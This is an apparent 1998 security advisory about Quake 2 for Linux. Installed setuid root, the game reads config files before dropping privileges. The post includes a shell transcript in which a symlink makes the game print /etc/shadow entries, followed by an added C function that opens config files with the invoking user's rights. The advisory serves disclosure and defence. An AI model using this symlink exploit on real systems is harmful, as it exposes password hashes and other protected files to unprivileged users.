Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files

From: kevingeoat_private
Date: Wed Feb 25 1998 - 02:49:58 PST


    Vulnerable:
    Everyone who followed the installation instructions and made Quake2 setuid
    root.
    
    Exploit:
    Quake2 reads its conf files (and .pak files) before giving up root,
    and it doesn't check the permissions beforehand.
    
    nop@chrome:~> id
    uid=501(nop) gid=100(users) groups=100(users)
    nop@chrome:~> mkdir baseq2
    nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
    nop@chrome:~> ls -l /usr/games/quake/quake2
    -rws--x--x   1 root     root       303444 Feb 24 19:07 /usr/games/quake/quake2
    nop@chrome:~> /usr/games/quake/quake2
    couldn't exec default.cfg
    execing config.cfg
    Unknown command "root:[snip]:10137:0:99999:7:::"
    Unknown command "bin:*:9977:0:99999:7:::"
    Unknown command "daemon:*:9977:0:99999:7:::"
    Unknown command "adm:*:9977:0:99999:7:::"
    Unknown command "lp:*:9977:0:99999:7:::"
    [etc]
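
The mitigation side of the transcript above, as an added example that is not part of the original post or of the Quake 2 source: a setuid program can open user-supplied configuration paths with the invoking user's identity, so the kernel applies that user's permissions to a link such as `baseq2/config.cfg`. The function name `open_config_as_invoker` is hypothetical, and the symlink and regular-file checks are extra hardening assumed here, not something the post describes.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: open a user-controlled config path with the
 * invoking user's rights instead of the setuid owner's.
 * Returns a read-only fd, or -1 with errno set. */
int open_config_as_invoker(const char *path)
{
    uid_t privileged = geteuid();   /* root in a setuid-root binary */
    uid_t invoker = getuid();       /* the user who ran the program */
    struct stat st;
    int fd, saved_errno;

    /* Temporarily take the invoker's identity; the kernel now checks
     * the invoker's permissions on every path component. */
    if (seteuid(invoker) != 0)
        return -1;

    /* Extra hardening (assumption, not from the post): refuse a
     * symlink as the final component and never block on a FIFO. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    saved_errno = errno;

    /* Restore the privileged euid; if that fails, fail closed. */
    if (seteuid(privileged) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd < 0) {
        errno = saved_errno;
        return -1;
    }
    /* Only regular files are accepted as configuration. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}
```

The temporary drop relies on the saved set-user-ID that a setuid binary keeps, which is what allows the second `seteuid` call to restore the original effective uid.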
    


